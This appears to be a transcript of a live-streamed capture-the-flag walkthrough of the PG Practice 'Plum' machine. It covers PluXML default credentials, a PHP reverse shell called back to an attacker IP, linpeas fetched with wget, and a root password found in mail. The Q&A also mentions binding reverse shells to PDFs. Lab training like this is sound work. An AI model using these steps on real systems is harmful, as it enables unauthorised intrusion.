So, hello, I think I'm audible. Let me share my. Change it to super. Cool. Hello, hello, hello. Think I'm audible, clear, everything's fine. Just let me know in the chat if it's everything's clear. So, sorry for the webcam. So, my webcam is done. I had to buy a new one. So, next time I'll definitely get a new one. For now, uh, just use this. Okay. So, just want to cover this Plum machine, so which is on PG practice. So I'll go to the practice. I think it's not free. You guys can pay that. You guys need to pay for that actually. So Plum. So I saw it like recently. So yeah, let me also start my Kali. Hope everything is good. Audio, video, and everything's yo. Just my screen and the voice. So everything's fine, I guess. So yeah. So this is going to be an easy box. So once this is done, I'll take up few of your questions if you have anything. So yeah, let's go ahead. Uh, is my Kali started? Yes. So sorry for that. So let's wait till this machine starts. Once that it's better to connect to VPN and turn on the machine, or else it's going to give you a local machine like their browser based Kali Linux. If you're fine with that, you can use it, but still I generally like to use my own Kali, so yeah, that's better for me. So this is my Kali. So I did made few aliases, guys, so I'll show you. It's tail HRC. You can see some of my aliases that I made. So like I create an alias like offsec VPN. Okay, it connects to my offensive security VPN, this VPN configuration file, HTTP server, LL. So these are some basic stuff that I generally use. So yeah, what's wrong in that? So and also some view scripts that I use on regular basis. So like creating a Python server and stuff. So I'll try to make a video on that in few days. So yeah, let's see what I can do there. So let me connect to the offsec VPN. So the command is simple for me here, or else if you are on different machine, like if your configuration is different, so just go to sudo open VPN and connect to that. This is my custom configuration, guys. So don't get confused. If you run this, you'll not get anything. So keep that in mind. I'm just turning on this machine, Plum. So this is a Linux-based machine, and it's ranked intermediate. Yeah, it's not too intermediate. It's very simple. I'll tell you some of the loopholes that you can find out and some of the loopholes that you can bypass so that it will be much simple for you to do such kind of machines. And this is one of such machine which where Linpiece also didn't do some good job here, so I had to go through manually. So I'll try to cover those topics as well. So let's go back. Let me open a new tab. So export IP equals to, okay, so this is how I do generally. So exporting my IP, so it's simple. So now if I type IP, sorry, it's echo IP, echo dollar IP, you can see this IP loading up. So sudo nmap. So I have like a command like this. For example, I can reuse this command several times with this IP variable here. So this is like using some kind of language kind of thing, and I don't want to save it anywhere. So just let this is like I'll tell you what this command does. So it's using a time frame of 4 SC for basic scripts, basic script scan, version scan, hyphen p hyphen for like all the 65,535 ports. And this is my IP, the target IP, and hyphen hyphen open. I'm looking for only open ports because I don't want to waste any time looking for others. Let's wait till the scan's completed. Yeah, I think the scan's done. It's pretty straightforward. You have only two open ports here. So yeah, that's fine. That sums up the stuff. And also, guys, I have this cool GitHub coming up. So I'm writing this GitHub God mode kind of thing. So which is like you can just copy paste the stuff and it's done. One second. Sorry for that. And this is my repository that I was talking about. And you can see I created some bunch of aliases here that you can use. And some commands here. So I can just copy this command. Like what you need to do is you need to just export your IPs and stuff. So some basic variables, and yeah, that's it. So now if you see here, this is a TCP scan. I'll also run a UDP scan. Let's see what we can find, because I feel this uh, attack surface is very bit less. If you sometimes, so this is a pro tip. So if you find like very few ports, and if you feel like those ports doesn't give anything, then just do UDP scan as well, because sometimes there may be some SNMP or some kind of a port opened on some UDP protocol. So you need to just check that out. It will be very helpful in those cases. So here you can see you have SSH. So SSH is something that I keep it for my last resort. So I just, if I don't find anything and brute force is the only option left, then SSH is the one that I'm going to use. So let's leave that for us, leave that aside. And you can see port 80 is open. So let's see what is there. And you can see it has PluxML, so PLUXML, some methods and stuff. So let's go there. Sorry. So you can see this is the PluxML. So this is like a blog. So let's click on administration here. I don't know what administration. It took me to a page here. So let's type some default credentials, or let's search for XML default credentials. because see, whenever it's obviously meant to be default credentials, because that is how you generally see CTFs, because CTFs are meant to be broken. So you can see some kind of stuff like this. So just always try, some kind of a default credentials and stuff. You have some lot of stuff here. Let's try with something simple. So admin and password, for example. No, it didn't work. Admin and admin, it works. So the guys here used a very weak password. So admin and admin, and it went there. So what I did was, like, when I opened this URL, there is some when I opened this web page, I saw an administration down there. I clicked on that, and it took me over to this admin panel, and I just tried some default credentials like admin, and admin worked. So that's how it is. Link for God mode, sure. It's still under development, Musab. So, it will take some time before it gets pretty fine. Okay, trust me, it's going to take some time. I'm trying to modify it. Okay, so it's the one you see is very less here. I committed a lot recently, so I'll push it once if I feel it's good. So this is like just copy paste stuff. Okay, so but that doesn't mean it's like a script kiddie stuff. So if you want to do it very quickly enough, so then it comes into the place. So yeah, you can definitely use that. And if you want to learn more, if you want a detailed cheat sheet, then you can find out my OSCP cheat sheet. This has like some detailed information here, so this works fine. So now let's go back. So you can see I was able to get into this page simply using this admin credential. So what we need to do is, like, okay, you can see here PLU XML 5.8.7. Let's search for that. Let's see if you have any exploits. Execute arbitrary code. Let's see what it is. So the CV to 2022 2508. Let's see what it is. Or else we'll try to do it manually because we have a web page here. So we can try to and do some stuff here. 2050 Okay, let's see that. What we have here is a PDF. Uh, Maybe it shows you how to do it. Let's see what happens here. So RC or OS injection, XML issues. Okay, you have a YouTube video here. I think this shows up something. So select the static pages and edit one of them. So I think don't need to watch a video. It's directly mentioned here. Log in with a manager account. So I think administrator works as a manager account here. Like we can manage stuff here using administrator page. So into the administrator menu, click on static pages and edit one of the pages. Insert the PHP code. Okay, they're asking PHP reversal. Okay, let's try this out. You have static pages here. Let's edit this. Okay, so okay, this is technically the page, so we need to edit this content. So you have a lot of PHP reversals. The one that I generally use is a hybrid one. So it's located at OPT PHP reversal. So this is a hybrid one, guys. So this works even for Windows and Linux. So it works for both. So it depends. It actually automates the stuff. So it works for Windows and Linux. So the Pentest Monkey ones only works for Linux. So you need to use a two different payloads every time when using for exploits. Like if you try to upload a PHP reversal of a Linux based, that doesn't work on a Windows target. So it's better to have something like this. So let me open this in my VS Code. Let's edit some stuff and then just close it out. Just don't mess up with any of this because it's doing some stuff here. Just change your thing to the L host, 2.168.45.202 here, and the port is going to be 1337 here. So that's it. Copy. Just don't want to save it. Just want to copy it here. Okay, you can see it's copied. Let's open a listener and see hyphen nvlp 1337. So let's save this page. Let's see view static one on the site. Let's click on that. You can see we got a shell. If I type who am I, you can see www dot hyphen data. So that's fine. Okay, that's fine. And let's see if we can upgrade this shell to a tty shell. So let's try Python 3. Yeah, we have a Python 3 here technically. So let me go back to my cheat sheet here. So this is my TTY shell cheat sheet. So I'm just going to copy paste this. The TTY is like generally upgrading the shell. So here you can see there is nothing here. You can't do much here using this particular shell that we got initially. Now you can see it's a bit different. You can do sudo hyphen l. It doesn't work. It's asking me for a password. And one more interesting thing, guys, that I observed it while doing it was if I go to the parameter section, let's wait. Hello, everyone. Hello, hello. Uh, it's hung actually. So yeah, if I go to the parameter section, there was a like a value kind. It looks like a password. It says administrator key. I thought it was a password for www-data, but no, it didn't work for me. So yeah, it maybe it's some kind of an API key or something like that. But yeah, that is what it is. So if I go to cd/home, let's see what user we can see. We don't have any user here. Oh shit. We don't have any user. I think only and try at C password. Let's see. Debian Exim. Okay, we have an Exim. It's not a user. It's like a service kind of thing. Uh, that's nobody, and these all are like general accounts or users that come up when you install a Linux machine. So technically, there are no machines on this machine. So www data is one of them, and you see mail account here. So this is something interesting. So maybe say there may be some mails out there. Who knows? Let's check them out. Sync and all this stuff. Okay, these are all pretty basic. So now you may be having doubt like where can I find my local.txt? So let's do find slash hyphen name local local.txt. Okay, and two greater than slash dev slash null. So this is for like I'm just trying to find out a file with name local.txt in the slash like everywhere, so on the whole system, and two greater than slash dev slash null is used to handle all the errors like permission errors and all those stuff like that. So you can just cat this and that's it. You got your file. You got your local flag. Sorry. Any questions or anything like that? Cool. So let's come back. So now we need to do privilege escalation. So basically what we generally do is like we upload lin piece. We tried sudo hyphen and it didn't work. So let's go back to my cheat sheet. Let's see what we can do here. Writable and stuff doesn't make much sense. So lin paste, that's pretty common. Let's see some any SUIDs. So SUIDs are very useful. You have an exim 4. Let's see if you have something for exim 4. If you didn't saw it, it's there. Sim4 is there. CHSH, PKX, these are like pretty common you see every time. So Exim4 looks kind of interesting. Let's see. Sorry. Let's type Exim. Oh, Exim4. No. Okay. So even this is useless. So capabilities. I never had luck with this capabilities, guys. Like I tried so many times, but I was never able to exploit capabilities on some CTFs like this. So I think it doesn't work for me. I think something like that. So let's see cron tabs, cron jobs or something like that. Oh, sorry, I think it didn't copy it well. Copy. Don't need to remember all these commands. Okay. We don't have anything here. Put. So nothing's here. What else? Front tab hyphen and also does the same thing. So yeah, let's see export. So this is like manual enumeration, guys. Like if you want, you can directly upload, linpiece and stuff. But the thing I like to check some sort of stuff, some basic stuff that I can see if I find them, then there is no point of running linpiece, right? So it's a lot of time saving thing here. So you can do whatever you want. Hi Lalam. So it is uh it's a CTF, it's a Plum walkthrough, it's a machine on PG practice. So we're almost done. So you can just rewatch it again. Okay, it's going to be there on my channel for a long time. So it's very simple. So privilege escalation is something that's going to be a bit hard on this machine, but yeah, not too hard. It's very simple, but it's mostly our eyes doesn't catch it out. So let's see. So now after trying all this stuff, it doesn't work. Doesn't seem like there is something else. So let's upload linpiece and try what we can. Okay. So if I do, so I have a HTTP server here. Sorry, shit. Let's. So this is my shortcut for launching the server on port 8000. That's fine. So you have something called linpiece here, pspy here. I think those are sufficient. So let's do that. So wget pb colon slash slash 192.168.45.202 port 8000 slash dot sh. Simple. Oh, the permission is denied. So let's do it in slash tmp. Much better and safer. Okay. What's the point of having a home directory if there are no users? And what's the point of having permissions? All bullshit. So yeah, if you do a linpiece, you have this linpiece. So let's do chmod plus x linpiece.sh or dot slash linpiece.sh. So this does take some time. In the meantime, if I'd like to take some questions from you if you have anything. So if you have any questions or something like that, just let me know. I'll just go through them. So I can see it's done. Uh, you have some stuff here, password and stuff. These are not that useful. You have a mail here. So you have mails here. So this is something that is interesting. So and this is the point actually. So most of the time we miss it out. So but we should always check the mails. So that's how important it is. I'll show you why it's very important. And you have nothing here. Get text.sh. This doesn't work actually. I thought there are some kind of files that may give me access, like trying to change some binaries and stuff. Nothing work like that. So all this doesn't work actually. I'll be honest with you. I tried all of them. If some file seems interesting, I just went there and see, and I saw them, but it didn't work. So what I can do now is I can go to that location where they said mail is there. If I do an ls here, you can see there is www data ls hyphen la. You can see there is a folder called as www hyphen data. So it's not folder, sorry, it's a file itself. So just do cat www hyphen data, and this has lot of emails here. Let's start from the first. So you can see this is where we ran the command. Yeah, this is where we ran it. You can see a lot of mails here. There may be some internal mail server. So or else this may be some part of urgent DDoS attack. Reply to the root. We are under attack. We have been targeted by an extremely complicated and sophisticated DDoS attack. I trust your skill. Please save us. And this guy gave hashed root password in a mail, and it is saved on the local machine. So this is a serious problem here. Let's see what else happened. Hmm, some basic stuff. Okay, some reports and all those stuff. So yeah, that's fine. So we got the credentials. Okay, so this is something, the thing I'm trying to, the reason why I told you is low. Most of the time, most of the machines even contains this var mail, but we tend to not check that. But don't know, we need to check it out because this is a CTF, so there is definitely a way around like that. So it's better to check that out. So now we got password. So su root, just paste the password. But who am I? I'm root. Done. It's game over. So hope it's clear. Yeah, the linpiece actually does uh, all those steps automatically. So that's the reason we use linpiece. Yeah, you can basically automate them, but yeah, I too can automate them, but linpiece is there, right? So what's the point of doing it again? So even linpiece does it, but it's a better way. It's very better. But these are some stuff. These are like only 4 or 5 commands that I run, right? So what's the point of making a script or stuff like that? I can just use my cheat sheet and I can just pull out the stuff easily. Don't get it. What if we don't? Will it get executed? I didn't got it. Yes, yeah, that's the reason actually. So if you can basically run that linpiece, my query is like, see, linpiece took like 5 minutes and it gave me a lot of output. So so basically, most of the time in Linux, if you're dealing with easy or uh, even hard or something like that, these are some basic stuff you need to do. Sudo hyphen l to list out stuff that you can run as sudo without password, SUIDs, capabilities, cron jobs. These are some stuff that you can quickly find it out. When to do plus X. If you see ls hyphen la musab, then you can find out something like there should be an X here. For example, if I go here, if I do ls hyphen la, you can see it doesn't have any executable rights. Okay, so in those cases, you need to give the plus X symbol there. So that's simple. And the reason why I did even with before checking is like even on my local machine, it doesn't have plus X. So even on my Kali machine, it is not executable. So I just had to just did it like in muscle memory. So but most of the time it's required generally. So because what happens in Linux is like there may be some kind of a permission where all the scripts that are downloaded are not in executable state by default. So generally in those cases you need to provide executable rights by default. Okay, so that's one thing that you need to remember. Everything's good, Imperial. I think this is paid, I guess, Lalam. But I'm planning to make a live stream every day. So this time is very bad because it's early morning in India. So I'll try to make a different time. So Yeah, next tomorrow also I'll try to come up with a new video actually. So let's see what happens. So yeah, this is like a weird time to come live, but yeah, for me it's evening. But it's I don't know what it is. It's a troll or if it's like a real name. I don't even know that. But it sounds super weird, dude. You talk with some Telugu guy, they'll definitely make fun of you. Definitely, man. This time is very bad. I agree with that. This is very bad time. I'll come up with some new time. Okay, so at evenings mostly in terms of India. So for me, it's going to be morning. This is weird time. I know that, but I had a commitment to make a video, so I just wanted to make a live stream today. So yeah, but yeah, still I'll be live for half an hour more. So you can just post your questions and stuff. Let's see if I can answer them or not. Yeah, sure. 7 p.m. Hmm, it's not like that, dude. So it depends on the technique. So it's not like there are so many guys out there. It's always about the technique. So if your technique is bit good, okay, if your technique is like an explode kind of stuff, then if you are able to find out the vulnerabilities, it is because the world has a lot of websites where you can find vulnerabilities, and people haven't been to locations, so it's more of a skill. Okay, so you can do that. I'm also planning to start this Pico City of live streams as well. So it consists of this web challenges. What skills? It's not the skills, it's about technique actually. So see, I can find an XXS using few ways, but assume that you're able to find out an XXS on some different way, cross-site scripting on a different way, which like no one find it out or some kind of stuff like that. Then it will definitely be a good thing for you, right? So it's like technique all the time. How you are able to find it out and what are the stuff like that. Yeah, like intruder techniques. Those are like known to it. So yeah, yeah, you can ask. Mm, why not PNPT? I don't know about PJPT, but I took TCM's PNPT. It's a very good thing. So PNPT is good, but I'm not at all sure about what this PJPT is. Like I never been through the curriculum. I think it's basic version of PNPT, but if you can do PNPT, man, it's very good. It's more of like real time stuff that you do. So it's mostly focused on Active Directory. I think PJPT is mostly focused on compromising a machine, I guess. So yeah, can I know the best recon tool? Hmm, there is nothing like the best, but Nmap, you know, uh, there is something like depends on what you want to find out actually. So if you want to see, recon has a lot of steps. It has something like subdomain enumeration, stuff like that, and kind of stuff like that. So for everything, there's a different tool. So I generally prefer stuff from Project Discovery. So they do have wonderful tools. They are written in Go and tools from Tom Nom Nom. So those are some of the good tools that you can use. Yeah, my lives are generally like within 45 to 60 minutes. So you don't need to worry about that. I don't go much longer than that. Weak registry service permissions. Okay. So like, what are you planning to do? Like, so, so like what? So you can see here, I just mentioned something like, first of all, I use WinPeace actually for finding out services which have like weak permissions. So and then checking the access check. So every service has a location actually. So for path of registry, because you're checking for registry stuff here. So you're trying to change the registry. So every service registry is some kind of a database. So you're checking for the services database if something is vulnerable or left interactive, stuff like that. So then using access check, you're trying to find out like whether you can do anything or stuff like that. Then you're trying to change some kind of parameter in that registry, and then you're going to restart that service. It's very simple. You can find out my video on that. How to Trojanize a PDF? That's a good question. So you have something called as binders, and even MSF Venom Metasploit also has some few modules for that. So you can, bind a reverse shell to a PDF. It's very simple, but yeah, you call it binders. So, Trojans are like cool thing that I like, but yeah, and I think there are so many others as well. So can't actually name them, but I definitely used Metasploit's module for this PDF of backdooring stuff. So C, man, C, I think C language is better. C or C plus plus, I think. Like going through the curriculum of my courses and stuff, I feel C is much better for developing malware and doing some kind of analysis and stuff. Make series on Active Directory. I already have on that, so you can just go to my channel's playlist and you'll find out a lot of Active Directory videos. So the thing with Active Directory is most of the stuff that I covered are educational, so it's not like practical. I didn't show you the stuff like how to do this on like CTFs and stuff. So that is something that I'm planning to do. As I have a PG practice subscription, I'll definitely make like 2 or 3. This whole week I have holidays, guys, so I'll tell you what's happening. So this whole week I have like uh spring break for me, so I'll try to make a live video every day of this, some kind of walkthroughs and stuff. So I'll do at least 3 Active Directory machines, okay, on PG practice, so it will be much more useful for you. So I can talk about Kerber roasting and SREP roasting like so many days, but if I can cover it on a real machine, then it's going to be wonderful. So yeah, I'll try to do that. At least three walkthroughs you can expect on my channel, so in this week itself. So yeah, thanks for asking, and that's a very good suggestion for me. So any questions, I'll be live for a lot of time. Still there's a lot of time. So this is a fairly easy machine. So this teaches us to check, okay, files and stuff as well. So don't leave anything lightly. So, and it's been a lot of time, guys, since I came live. So I plan to I wanted to do videos, but live is much better for me. So of course it doesn't take a lot of preparation and stuff. Yeah, so 20 more questions and stuff, I'd be happy to answer. And super sorry, guys, like this time is super weird. I'll try to come the different time, full time on any one more tool as did multiple times, because you have some time, make it. What demo you want? What type of tool demo you want? You can be a bit specific. I can, I can think of that. The thing is, like, I covered a lot of tool demos in the past, but what happens is, like, after some time, those tools doesn't match up with the real time, and you'll get a lot of errors. So that's the reason I'm like bit hesitant to make videos on tools. So that's something. But I'm planning to make a video on this volatility framework. This is a memory for memory. This is a forensic tool. Well, I'm planning to make a video on this because yeah, we should also cover forensics part and stuff like that because we should be like more diverse. Yeah, I'm not working anywhere actually. I'm currently studying ZA proxy. Honestly, Lalam, I don't use ZA proxy actually. My workflow is mostly based on burp suit, so you know. So I think at this point I cannot cover that, but I need some kind of learning. I need to see those options and stuff. Like what I do is like every time I find a web challenge agenda, my hand actually goes to burp suit because I'm like most used and like I'm like very happy to use burp suit because it's something that I feel it's very useful for me. I'm not saying ZA proxy is bad, but yeah, that's how my muscle memory and my everything is set it up. So so yeah, I need to check that out, ZA proxy. But I do like the interface and stuff on burp suit a lot. So let's see, I'll give it a try, and if I like it, I'll definitely make a video on that. Yeah, any questions and stuff? I currently use community version, version 1.3.7. So I used to have a premium one, but it's expired. So yeah, I used 1.3.7 burps and it works absolutely fine. And I do like that interface a lot, and it's much more. It's not only my opinion, but if you go and check it out on Twitter, like Jason Haddix and a lot of the people, top bug bounty hunters even use the same version, that 1.7 series version. I think it's good because people reported a lot of errors with this, the latest version. So yeah, there may be some trick going on. Yeah, Windows and Linux plus escalation, you need to learn about Active Directory, then OSCP preparation would be a better thing. and if possible, try to solve some PG practice machines before taking OSCP. I'm planning to give my OSCP in April, so let's see what happens. And the lap time also is like, you should be very careful with that lap time, because it's better to take the learn one subscription. That's what I felt in my opinion, because you have 365 days of lab access. That is much more useful than just buying the voucher. So just think of that. Like, if you feel it's costly, then just buy the voucher. Okay, you can obviously buy this PG practice and stuff. Those are much cheaper than this OSCP, labs and stuff. So yeah. So any questions and stuff? There is no guarantee, dude. No guys who did OSCP and still looking for jobs. So it's something that's quite different. It's more like a milestone in my opinion. So OSCP is a milestone that, okay, you are into pen testing, so you can do some stuff. That is like a milestone. I don't know if you can get a job. Yeah, you can get a job with that, but I think they'll definitely look for other skills as well apart from OSCP. So yeah, this is like a one step that you can take forward. Depends. Can guarantee you will get. Yeah, it will be beneficiary if you're applying for pen testing job. That's sure. But I'm not sure if it will definitely land you a job. Oh, really? Uh, okay, maybe you can re-reply. I didn't got them. You can see my screen is still here. I didn't do anything. Or else tag me on Discord and ask. So I'll see there at least if it is getting filtered. No, if even though if I get blocked words, it will show me like offensive word. Do you want to block, unblock or not? No, it's not showing up. I'm not sure, man. Just post it on my Discord if you are on. Just get it done quickly. So yep, I think is it for today. So mm, sorry for posting the live in the weird time. For me it's night, but for you it's early morning. So yeah, fine. I'll try to cover it up in a better way. So yeah, that is it for today. So thank you for joining my stream for tonight. So if you have any more questions, you can always post it on my Reddit. Sorry, Discord. I don't have any Reddit. I'm sorry for that. Or just tag me on Twitter or anywhere if you feel that I'm available on. So I'll try to reply as soon as possible within 1 to 2 business days. So yeah, thank you for watching. Thank you for joining the stream. I'll see you again. Bye. Take care.